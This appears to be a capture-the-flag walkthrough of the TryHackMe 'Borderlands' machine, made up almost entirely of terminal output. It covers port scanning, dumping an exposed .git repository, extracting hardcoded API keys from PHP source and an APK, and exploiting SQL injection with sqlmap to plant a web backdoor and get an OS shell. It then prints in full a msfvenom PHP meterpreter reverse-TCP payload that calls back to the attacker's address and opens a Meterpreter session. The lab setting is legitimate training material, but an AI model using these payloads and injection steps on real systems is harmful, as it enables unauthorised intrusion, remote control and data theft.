Borderlands

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72

kali@kali:~/CTFs/tryhackme/Borderlands$ sudo nmap -p- -A -sS -sC -sV -O --script vuln 10.10.65.7
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-10 14:08 CEST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.65.7
Host is up (0.033s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
|   cpe:/a:openbsd:openssh:7.2p2:
|       CVE-2008-3844   9.3     https://vulners.com/cve/CVE-2008-3844
|       CVE-2016-8858   7.8     https://vulners.com/cve/CVE-2016-8858
|       CVE-2016-6515   7.8     https://vulners.com/cve/CVE-2016-6515
|       CVE-2016-10009  7.5     https://vulners.com/cve/CVE-2016-10009
|       CVE-2016-10012  7.2     https://vulners.com/cve/CVE-2016-10012
|       CVE-2015-8325   7.2     https://vulners.com/cve/CVE-2015-8325
|       CVE-2016-10010  6.9     https://vulners.com/cve/CVE-2016-10010
|       CVE-2019-6111   5.8     https://vulners.com/cve/CVE-2019-6111
|       CVE-2018-15919  5.0     https://vulners.com/cve/CVE-2018-15919
|       CVE-2018-15473  5.0     https://vulners.com/cve/CVE-2018-15473
|       CVE-2017-15906  5.0     https://vulners.com/cve/CVE-2017-15906
|       CVE-2016-10708  5.0     https://vulners.com/cve/CVE-2016-10708
|       CVE-2019-16905  4.4     https://vulners.com/cve/CVE-2019-16905
|       CVE-2016-6210   4.3     https://vulners.com/cve/CVE-2016-6210
|       CVE-2007-2768   4.3     https://vulners.com/cve/CVE-2007-2768
|       CVE-2019-6110   4.0     https://vulners.com/cve/CVE-2019-6110
|       CVE-2019-6109   4.0     https://vulners.com/cve/CVE-2019-6109
|       CVE-2014-9278   4.0     https://vulners.com/cve/CVE-2014-9278
|       CVE-2018-20685  2.6     https://vulners.com/cve/CVE-2018-20685
|_      CVE-2016-10011  2.1     https://vulners.com/cve/CVE-2016-10011
80/tcp   open   http       nginx 1.14.0 (Ubuntu)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /info.php: Possible information file
|_  /.git/HEAD: Git folder
| http-git:
|   10.10.65.7:80/.git/
|     Git repository found!
|     .git/config matched patterns 'user'
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: added mobile apk for beta testing.
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
8080/tcp closed http-proxy
Device type: general purpose|specialized|storage-misc|printer|WAP
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X|2.4.X (90%), Crestron 2-Series (89%), HP embedded (89%), Asus embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:linux:linux_kernel:2.4
Aggressive OS guesses: Linux 3.10 - 3.13 (90%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 or 4.2 (90%), Linux 3.2 - 3.5 (90%), Linux 3.2 - 3.8 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Crestron XPanel control system (89%), Linux 3.13 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   33.07 ms 10.8.0.1
2   33.40 ms 10.10.65.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 270.02 seconds

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

kali@kali:~/CTFs/tryhackme/Borderlands/git$ sudo python /opt/GitHack/GitHack.py http://10.10.65.7:80/.git/
[+] Download and parse index file ...
CTX_WSUSpect_White_Paper.pdf
Context_Red_Teaming_Guide.pdf
Context_White_Paper_Pen_Test_101.pdf
Demystifying_the_Exploit_Kit_-_Context_White_Paper.pdf
Glibc_Adventures-The_Forgotten_Chunks.pdf
api.php
functions.php
home.php
index.php
info.php
[OK] api.php
[OK] info.php
[OK] index.php
[OK] home.php
[OK] functions.php
[OK] Context_White_Paper_Pen_Test_101.pdf
[OK] CTX_WSUSpect_White_Paper.pdf
[OK] Context_Red_Teaming_Guide.pdf
[OK] Glibc_Adventures-The_Forgotten_Chunks.pdf
[OK] Demystifying_the_Exploit_Kit_-_Context_White_Paper.pdf

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

kali@kali:~/CTFs/tryhackme/Borderlands/git$ curl http://10.10.65.7/.git/logs/HEAD > HEAD
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1332  100  1332    0     0  21142      0 --:--:-- --:--:-- --:--:-- 21142
kali@kali:~/CTFs/tryhackme/Borderlands/git$ cat HEAD
0000000000000000000000000000000000000000 152b2d9976cd37a68fd462af8e4ce21356b5485e Context Information Security <recruitment@contextis.com> 1568122271 +0100     commit (initial): created repo
152b2d9976cd37a68fd462af8e4ce21356b5485e 93bab0a450caaa8c4d2632703636eccc69062bb4 Context Information Security <recruitment@contextis.com> 1568122438 +0100     commit: added under construction page
93bab0a450caaa8c4d2632703636eccc69062bb4 79c9539b6566b06d6dec2755fdf58f5f9ec8822f Context Information Security <recruitment@contextis.com> 1568122828 +0100     commit: added basic prototype of api gateway
79c9539b6566b06d6dec2755fdf58f5f9ec8822f b2f776a52fe81a731c6c0fa896e7f9548aafceab Context Information Security <recruitment@contextis.com> 1568122860 +0100     commit: removed sensitive data
b2f776a52fe81a731c6c0fa896e7f9548aafceab 04f1f411857cc972ae8ed5efcffa298f5f6168fb Context Information Security <recruitment@contextis.com> 1568122932 +0100     commit: added theme
04f1f411857cc972ae8ed5efcffa298f5f6168fb fee5595bb2ba1d1ab005ec3de98367fe5d021e9f Context Information Security <recruitment@contextis.com> 1568123006 +0100     commit: added white paper pdf's
fee5595bb2ba1d1ab005ec3de98367fe5d021e9f 6db3cf70b469de942f2f529166088cdfbbd5f764 Context Information Security <recruitment@contextis.com> 1568123071 +0100     commit: added mobile apk for beta testing.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

kali@kali:~/CTFs/tryhackme/Borderlands$ apktool d mobile-app-prototype.apk
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
I: Using Apktool 2.4.1-dirty on mobile-app-prototype.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/kali/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
kali@kali:~/CTFs/tryhackme/Borderlands$ cd mobile-app-prototype/
kali@kali:~/CTFs/tryhackme/Borderlands/mobile-app-prototype$ grep -rn 'encrypted_api_key'
smali/com/example/ctf1/R$string.smali:98:.field public static final encrypted_api_key:I = 0x7f0b0028
res/values/public.xml:892:    <public type="string" name="encrypted_api_key" id="0x7f0b0028" />
res/values/strings.xml:43:    <string name="encrypted_api_key">CBQOSTEFZNL5U8LJB2hhBTDvQi2zQo</string>
kali@kali:~/CTFs/tryhackme/Borderlands/mobile-app-prototype$

1
2
3
4
5

CBQOSTEFZNL5U8LJB2hhBTDvQi2zQo

ANDVOWLDLAS5Q8OQZ2tu

ANDVOWLDLAS5Q8OQZ2tuIPGcOu2mXk

1

kali@kali:~/CTFs/tryhackme/Borderlands/git$ cat 10.10.65.7_80/home.php

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

<?php

session_start();
require_once("functions.php");

$conn = setup_db_connection();

if (!isset($_SESSION['loggedin']) || $_SESSION['loggedin'] !== true)
{
    header("Location: index.php");
    die();
}

echo ("<p>Click on a link below to view the document properties</p>");


$stmt = $conn -> prepare('SELECT documentid, documentname, location FROM documents');

$stmt -> execute();
$stmt -> store_result();
$stmt -> bind_result($documentid, $document_name, $location);

$resultsArray = [];
echo ("<ul>");
while ($stmt -> fetch()) {
    echo ('<li><a href="api.php?documentid='.$documentid.'&amp;apikey=WEBLhvOJAH8d50Z4y5G5g4McG1GMGD">'.$document_name.'</a></li>');
    $resultsArray[] = array("documentid" => $documentid, "documentname" => $document_name, "location" => $location);
}
echo ("</ul>");

/*
if (isset($_GET['documentid']) && is_numeric($_GET['documentid']))
{
    foreach ($resultsArray as $result)
    {
        if ($result["documentid"] == $_GET['documentid'])
        {
            echo "<p>Enter the new name for the document: ".$result['documentname']."</p>";
            echo ('<form method="GET" action="api.php">');
            echo ('<input type="hidden" id="documentid" name="documentid" value="'.$_GET['documentid'].'" />');
            echo ('<input type="hidden" id="apikey" name="apikey" value="WEBLhvOJAH8d50Z4y5G5g4McG1GMGD" />');
            echo ('<input type="text" id="newname" name="newname" />');
            echo ('<input type="submit" />');
        }
    }
}
*/

?>

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

kali@kali:~/CTFs/tryhackme/Borderlands/git/.git$ git cat-file -p 79c9539b6566b06d6dec2755fdf58f5f9ec8822f
tree 51d63292792fb7f97728cd3dcaac3ef364f374ba
parent 93bab0a450caaa8c4d2632703636eccc69062bb4
author Context Information Security <recruitment@contextis.com> 1568122828 +0100
committer Context Information Security <recruitment@contextis.com> 1568122828 +0100

added basic prototype of api gateway
kali@kali:~/CTFs/tryhackme/Borderlands/git/.git$ git cat-file -p 51d63292792fb7f97728cd3dcaac3ef364f374ba
100644 blob 2229eb414d7945688b90d7cd0a786fd888bcc6a4    api.php
100644 blob 9eb9f94f73113d785e65c7e3ec0cba54e0b7cf43    functions.php
100644 blob 2a116a56a6e31ef1836796936dbc05af1f986a26    home.php
100755 blob 470cac65fcd0f8556f13997957a331628482aa96    index.html
100644 blob 4f4ced90fcad774ca4f9f966dbb227ebe7f77a83    index.php
100644 blob 6480abf34a54d3055b437766be872a13bcebdf7d    info.php
kali@kali:~/CTFs/tryhackme/Borderlands/git/.git$ git cat-file -p 2229eb414d7945688b90d7cd0a786fd888bcc6a4
<?php

require_once("functions.php");

if (!isset($_GET['apikey']) || ((substr($_GET['apikey'], 0, 20) !== "WEBLhvOJAH8d50Z4y5G5") && substr($_GET['apikey'], 0, 20) !== "ANDVOWLDLAS5Q8OQZ2tu" && substr($_GET['apikey'], 0, 20) !== "GITtFi80llzs4TxqMWtCotiTZpf0HC"))
{
    die("Invalid API key");
}

if (!isset($_GET['documentid']))
{
    die("Invalid document ID");
}

/*
if (!isset($_GET['newname']) || $_GET['newname'] == "")
{
    die("invalid document name");
}
*/

$conn = setup_db_connection();

//UpdateDocumentName($conn, $_GET['documentid'], $_GET['newname']);

$docDetails = GetDocumentDetails($conn, $_GET['documentid']);
if ($docDetails !== null)
{
    //print_r($docDetails);
    echo ("Document ID: ".$docDetails['documentid']."<br />");
    echo ("Document Name: ".$docDetails['documentname']."<br />");
    echo ("Document Location: ".$docDetails['location']."<br />");
}

?>

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155

kali@kali:~/CTFs/tryhackme/Borderlands$ sqlmap -r r.txt --dbs --batch
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.9#stable}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:23:55 /2020-10-10/

[15:23:55] [INFO] parsing HTTP request from 'r.txt'
[15:23:55] [INFO] testing connection to the target URL
[15:23:55] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:23:55] [INFO] testing if the target URL content is stable
[15:23:55] [INFO] target URL content is stable
[15:23:55] [INFO] testing if GET parameter 'documentid' is dynamic
[15:23:56] [INFO] GET parameter 'documentid' appears to be dynamic
[15:23:56] [INFO] heuristic (basic) test shows that GET parameter 'documentid' might be injectable (possible DBMS: 'MySQL')
[15:23:56] [INFO] heuristic (XSS) test shows that GET parameter 'documentid' might be vulnerable to cross-site scripting (XSS) attacks
[15:23:56] [INFO] testing for SQL injection on GET parameter 'documentid'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[15:23:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:23:56] [WARNING] reflective value(s) found and filtering out
[15:23:56] [INFO] GET parameter 'documentid' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Document")
[15:23:56] [INFO] testing 'Generic inline queries'
[15:23:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:23:56] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:23:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:23:57] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:23:57] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[15:23:57] [INFO] GET parameter 'documentid' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable
[15:23:57] [INFO] testing 'MySQL inline queries'
[15:23:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:23:57] [WARNING] time-based comparison requires larger statistical model, please wait............... (done)
[15:23:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:23:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:23:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:23:58] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[15:23:58] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[15:23:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:24:08] [INFO] GET parameter 'documentid' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[15:24:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:24:08] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:24:08] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[15:24:08] [INFO] target URL appears to have 3 columns in query
[15:24:09] [INFO] GET parameter 'documentid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'documentid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: documentid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: documentid=1 AND 9778=9778&apikey=WEBLhvOJAH8d50Z4y5G5g4McG1GMGD

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: documentid=1 AND GTID_SUBSET(CONCAT(0x716b6b7671,(SELECT (ELT(4499=4499,1))),0x71717a7a71),4499)&apikey=WEBLhvOJAH8d50Z4y5G5g4McG1GMGD

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: documentid=1 AND (SELECT 9277 FROM (SELECT(SLEEP(5)))QLXf)&apikey=WEBLhvOJAH8d50Z4y5G5g4McG1GMGD

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: documentid=-5651 UNION ALL SELECT CONCAT(0x716b6b7671,0x63735677525547714769417a62527142524655747a414b6f564e4e41615866745165665767505a77,0x71717a7a71),NULL,NULL-- -&apikey=WEBLhvOJAH8d50Z4y5G5g4McG1GMGD
---
[15:24:09] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[15:24:09] [INFO] fetching database names
[15:24:09] [INFO] retrieved: 'information_schema'
[15:24:09] [INFO] retrieved: 'myfirstwebsite'
[15:24:09] [INFO] retrieved: 'mysql'
[15:24:09] [INFO] retrieved: 'performance_schema'
[15:24:09] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] myfirstwebsite
[*] mysql
[*] performance_schema
[*] sys

[15:24:09] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.10.130.73'

[*] ending @ 15:24:09 /2020-10-10/

kali@kali:~/CTFs/tryhackme/Borderlands$ sqlmap -r r.txt -D myfirstwebsite --os-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.9#stable}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:24:22 /2020-10-10/

[15:24:22] [INFO] parsing HTTP request from 'r.txt'
[15:24:22] [INFO] resuming back-end DBMS 'mysql'
[15:24:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: documentid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: documentid=1 AND 9778=9778&apikey=WEBLhvOJAH8d50Z4y5G5g4McG1GMGD

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: documentid=1 AND GTID_SUBSET(CONCAT(0x716b6b7671,(SELECT (ELT(4499=4499,1))),0x71717a7a71),4499)&apikey=WEBLhvOJAH8d50Z4y5G5g4McG1GMGD

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: documentid=1 AND (SELECT 9277 FROM (SELECT(SLEEP(5)))QLXf)&apikey=WEBLhvOJAH8d50Z4y5G5g4McG1GMGD

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: documentid=-5651 UNION ALL SELECT CONCAT(0x716b6b7671,0x63735677525547714769417a62527142524655747a414b6f564e4e41615866745165665767505a77,0x71717a7a71),NULL,NULL-- -&apikey=WEBLhvOJAH8d50Z4y5G5g4McG1GMGD
---
[15:24:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[15:24:22] [INFO] going to use a web backdoor for command prompt
[15:24:22] [INFO] fingerprinting the back-end DBMS operating system
[15:24:23] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n
[15:24:30] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 4
[15:24:32] [INFO] using generated directory list: /var/www,/var/www/html,/var/www/htdocs,/var/www/httpdocs,/var/www/php,/var/www/public,/var/www/src,/var/www/site,/var/www/build,/var/www/web,/var/www/data,/var/www/sites/all,/var/www/www/build,/usr/local/apache,/usr/local/apache/html,/usr/local/apache/htdocs,/usr/local/apache/httpdocs,/usr/local/apache/php,/usr/local/apache/public,/usr/local/apache/src,/usr/local/apache/site,/usr/local/apache/build,/usr/local/apache/web,/usr/local/apache/www,/usr/local/apache/data,/usr/local/apache/sites/all,/usr/local/apache/www/build,/usr/local/apache2,/usr/local/apache2/html,/usr/local/apache2/htdocs,/usr/local/apache2/httpdocs,/usr/local/apache2/php,/usr/local/apache2/public,/usr/local/apache2/src,/usr/local/apache2/site,/usr/local/apache2/build,/usr/local/apache2/web,/usr/local/apache2/www,/usr/local/apache2/data,/usr/local/apache2/sites/all,/usr/local/apache2/www/build,/usr/local/www/apache22,/usr/local/www/apache22/html,/usr/local/www/apache22/htdocs,/usr/local/www/apache22/httpdocs,/usr/local/www/apache22/php,/usr/local/www/apache22/public,/usr/local/www/apache22/src,/usr/local/www/apache22/site,/usr/local/www/apache22/build,/usr/local/www/apache22/web,/usr/local/www/apache22/www,/usr/local/www/apache22/data,/usr/local/www/apache22/sites/all,/usr/local/www/apache22/www/build,/usr/local/www/apache24,/usr/local/www/apache24/html,/usr/local/www/apache24/htdocs,/usr/local/www/apache24/httpdocs,/usr/local/www/apache24/php,/usr/local/www/apache24/public,/usr/local/www/apache24/src,/usr/local/www/apache24/site,/usr/local/www/apache24/build,/usr/local/www/apache24/web,/usr/local/www/apache24/www,/usr/local/www/apache24/data,/usr/local/www/apache24/sites/all,/usr/local/www/apache24/www/build,/usr/local/httpd,/usr/local/httpd/html,/usr/local/httpd/htdocs,/usr/local/httpd/httpdocs,/usr/local/httpd/php,/usr/local/httpd/public,/usr/local/httpd/src,/usr/local/httpd/site,/usr/local/httpd/build,/usr/local/httpd/web,/usr/local/httpd/www,/usr/local/httpd/data,/usr/local/httpd/sites/all,/usr/local/httpd/www/build,/var/www/nginx-default,/var/www/nginx-default/html,/var/www/nginx-default/htdocs,/var/www/nginx-default/httpdocs,/var/www/nginx-default/php,/var/www/nginx-default/public,/var/www/nginx-default/src,/var/www/nginx-default/site,/var/www/nginx-default/build,/var/www/nginx-default/web,/var/www/nginx-default/www,/var/www/nginx-default/data,/var/www/nginx-default/sites/all,/var/www/nginx-default/www/build,/srv/www,/srv/www/html,/srv/www/htdocs,/srv/www/httpdocs,/srv/www/php,/srv/www/public,/srv/www/src,/srv/www/site,/srv/www/build,/srv/www/web,/srv/www/data,/srv/www/sites/all,/srv/www/www/build
use any additional custom directories [Enter for None]: /var/www/html
[15:24:46] [WARNING] unable to automatically parse any web server path
[15:24:46] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[15:24:46] [WARNING] potential permission problems detected ('Permission denied')
[15:24:47] [WARNING] unable to upload the file stager on '/var/www/'
[15:24:47] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[15:24:47] [WARNING] expect junk characters inside the file as a leftover from UNION query
[15:24:47] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[15:24:47] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[15:24:47] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://10.10.130.73:80/tmpupkap.php
[15:24:47] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://10.10.130.73:80/tmpbsjex.php
[15:24:47] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89

kali@kali:~/CTFs/tryhackme/Borderlands$ msfvenom -p php/meterpreter/reverse_tcp lhost=10.8.106.222 lport=4445 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1113 bytes
/*<?php /**/ error_reporting(0); $ip = '10.8.106.222'; $port = 4445; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
kali@kali:~/CTFs/tryhackme/Borderlands

kali@kali:~/CTFs/tryhackme/Borderlands$ msfconsole
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp


      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx
  lOOOOOOOO.         ;d;         ,OOOOOOOOl
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.
   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl
      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;
       .dOOo   .OOOOocccxOOOO.   xOOd.
         ,kOl  .OOOOOOOOOOOOO. .dOk,
           :kk;.OOOOOOOOOOOOO.cOk:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use the resource command to run commands from a file

msf5 exploit(windows/smb/ms17_010_eternalblue) > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set lport 4445
lport => 4445
msf5 exploit(multi/handler) > set lhost 10.8.106.222
lhost => 10.8.106.222
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.8.106.222:4445
[*] Sending stage (38288 bytes) to 10.10.130.73
[*] Meterpreter session 1 opened (10.8.106.222:4445 -> 10.10.130.73:59268) at 2020-10-10 15:30:27 +0200

meterpreter > ls
Listing: /var/www/html
======================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40755/rwxr-xr-x   4096     dir   2019-09-18 13:33:10 +0200  .git
100440/r--r-----  533824   fil   2019-09-06 17:49:35 +0200  CTX_WSUSpect_White_Paper.pdf
100440/r--r-----  821311   fil   2019-09-06 17:49:35 +0200  Context_Red_Teaming_Guide.pdf
100440/r--r-----  57770    fil   2019-09-06 17:49:35 +0200  Context_White_Paper_Pen_Test_101.pdf
100440/r--r-----  1963179  fil   2019-09-06 17:49:35 +0200  Demystifying_the_Exploit_Kit_-_Context_White_Paper.pdf
